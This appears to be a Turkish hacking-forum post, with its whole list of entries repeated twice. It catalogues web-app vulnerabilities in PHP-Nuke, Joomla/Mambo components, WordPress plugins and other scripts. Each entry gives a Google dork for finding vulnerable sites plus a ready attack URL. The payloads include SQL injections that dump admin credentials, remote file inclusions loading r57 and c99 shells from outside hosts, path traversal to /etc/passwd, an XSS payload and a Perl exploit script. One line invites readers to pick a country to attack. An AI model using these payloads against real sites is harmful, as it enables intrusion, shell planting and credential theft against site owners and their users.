endLesS
Webmaster
PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''
Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: "inurl:/plugins/wordtube"
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Not: Html'den sonrasına kendi shell adresiniz gerekli.
Joomla" Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=7...m3na_authors--
USER
http://www.xxx.com/news.php?newsid=7...m3na_authors--
Com-Actualite Açığı
Google Arama : allinurl: "com_actualite"
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:"/com_mtree/"
Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Com-Lmo Açığı
Google Arama : "com_lmo"
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Com-PonyGallery Açığı
Google Arama : inurl:"index.php?option=com_ponygallery"
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:"/index.php?option=com_rsfiles"
Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google Arama : inurl:"com_joomlaradiov5"
Site Sonuna : http://www.site.com/administrator/co.../c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : "com_joomlaflashfun"
Site Sonuna : http://xxx.net/2007/administrator/co...fig_live_site=[attacker]
Carousel Flash Image Açığı
Google Arama : inurl:"com_jjgallery
Site Sonuna : http://[taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kanbolat:
WebLosning Açığı
Dork : allinurl: "index2.php?id"
Exploide
1 http://www.target.dk/index2.php?id=-...web1_brugere/*
2 http://www.target.dk/index2.php?id=2...web2_brugere/*
3 http://www.target.dk/index2.php?id=-...web3_brugere/*
4 http://www.target.dk/index2.php?id=-...web4_brugere/*
Powered By: MFH v1 Açığı
Dork: "Powered by: MFH v1"
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)
W.G.C.C Açığı
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Açığı
Dork: "powered by zomplog"
Exploit:
http://localhost/path/upload/force_d...e_download.php
Xcart Rfi Açığı
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Exploide:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...
Powered By Linkspile Açığı
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat_...*/lp_user_tb/*
The Realestate Script Açığı
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?doc...rd)+from+admin
Calogic Calendars V1.2.2 Açığı
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Açığı
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
Exploit:
http://localhost/izabi/system/cache/...s/id_shell.php
Example:
http://localhost/izabi/system/image.....php&width=500
AJ Auction 6.2.1 Açığı
DORK: inurl:"classifide_ad.php"
Exploide:
http://site.com/classifide_ad.php?it...LIMIT/**/0,1/*
Powered By Novus Açığı
Dork: "Powered by Novus"
İnformation server:
http://[novus]/notas.asp?nota_id...t(int,db_name())
http://[novus]/notas.asp?nota_id...nt,system_user)
http://[novus]/notas.asp?nota_id...@servername)--
http://[novus]/notas.asp?nota_id...t,@@version)--
Com-Mgm Açığı
Google Dork: inurl:"com_mgm"
Exploide:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurl
hp?option=com_thopper
Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?
Com-PeopleBook Açığı
Google Dork: inurl:com_peoplebook
Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Joomla Component AstatsPRO Açığı
Dork: allinurl: "com_astatspro"
Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
http://localhost/events.php?idevent=...*/mysql.user/*
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Açığı
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=
ezContents CMS Açığı
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Açığı
Dork: "inurlowered by SoftbizScripts" veya "Subscribe Newsletter"
Exploit: http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
Script Açığıdır...
ProfileCMS v1.0 Açığı
Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=prof...from%20users/*
http://target.org/index.php?app=vide...from%20users/*
http://target.net/index.php?app=arca...from%20users/*
http://target.net/index.php?app=arca...from%20users/*
Com-Rsgallery Açığı
Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Powered By Power Editor Açığı
Dork: Powered By Power Editor
Exploid : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..
Kmitam Açığı
Dork: "inurl:/kmitam/"
Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
BackLinkSpider Açığı
Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"
Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.site.com/[backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
Kanbolat:
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''
Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: "inurl:/plugins/wordtube"
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Not: Html'den sonrasına kendi shell adresiniz gerekli.
Joomla" Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=7...m3na_authors--
USER
http://www.xxx.com/news.php?newsid=7...m3na_authors--
Com-Actualite Açığı
Google Arama : allinurl: "com_actualite"
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:"/com_mtree/"
Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Com-Lmo Açığı
Google Arama : "com_lmo"
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Com-PonyGallery Açığı
Google Arama : inurl:"index.php?option=com_ponygallery"
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:"/index.php?option=com_rsfiles"
Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google Arama : inurl:"com_joomlaradiov5"
Site Sonuna : http://www.site.com/administrator/co.../c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : "com_joomlaflashfun"
Site Sonuna : http://xxx.net/2007/administrator/co...fig_live_site=[attacker]
Carousel Flash Image Açığı
Google Arama : inurl:"com_jjgallery
Site Sonuna : http://[taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kanbolat:
WebLosning Açığı
Dork : allinurl: "index2.php?id"
Exploide
1 http://www.target.dk/index2.php?id=-...web1_brugere/*
2 http://www.target.dk/index2.php?id=2...web2_brugere/*
3 http://www.target.dk/index2.php?id=-...web3_brugere/*
4 http://www.target.dk/index2.php?id=-...web4_brugere/*
Powered By: MFH v1 Açığı
Dork: "Powered by: MFH v1"
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)
W.G.C.C Açığı
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Açığı
Dork: "powered by zomplog"
Exploit:
http://localhost/path/upload/force_d...e_download.php
Xcart Rfi Açığı
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Exploide:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...
Powered By Linkspile Açığı
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat_...*/lp_user_tb/*
The Realestate Script Açığı
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?doc...rd)+from+admin
Calogic Calendars V1.2.2 Açığı
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Açığı
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
Exploit:
http://localhost/izabi/system/cache/...s/id_shell.php
Example:
http://localhost/izabi/system/image.....php&width=500
AJ Auction 6.2.1 Açığı
DORK: inurl:"classifide_ad.php"
Exploide:
http://site.com/classifide_ad.php?it...LIMIT/**/0,1/*
Powered By Novus Açığı
Dork: "Powered by Novus"
İnformation server:
http://[novus]/notas.asp?nota_id...t(int,db_name())
http://[novus]/notas.asp?nota_id...nt,system_user)
http://[novus]/notas.asp?nota_id...@servername)--
http://[novus]/notas.asp?nota_id...t,@@version)--
Com-Mgm Açığı
Google Dork: inurl:"com_mgm"
Exploide:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurl
Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?
Com-PeopleBook Açığı
Google Dork: inurl:com_peoplebook
Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Joomla Component AstatsPRO Açığı
Dork: allinurl: "com_astatspro"
Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
http://localhost/events.php?idevent=...*/mysql.user/*
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Açığı
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=
ezContents CMS Açığı
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Açığı
Dork: "inurlowered by SoftbizScripts" veya "Subscribe Newsletter"
Exploit: http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
Script Açığıdır...
ProfileCMS v1.0 Açığı
Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=prof...from%20users/*
http://target.org/index.php?app=vide...from%20users/*
http://target.net/index.php?app=arca...from%20users/*
http://target.net/index.php?app=arca...from%20users/*
Com-Rsgallery Açığı
Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Powered By Power Editor Açığı
Dork: Powered By Power Editor
Exploid : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..
Kmitam Açığı
Dork: "inurl:/kmitam/"
Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
BackLinkSpider Açığı
Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"
Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.site.com/[backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
Kanbolat:
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--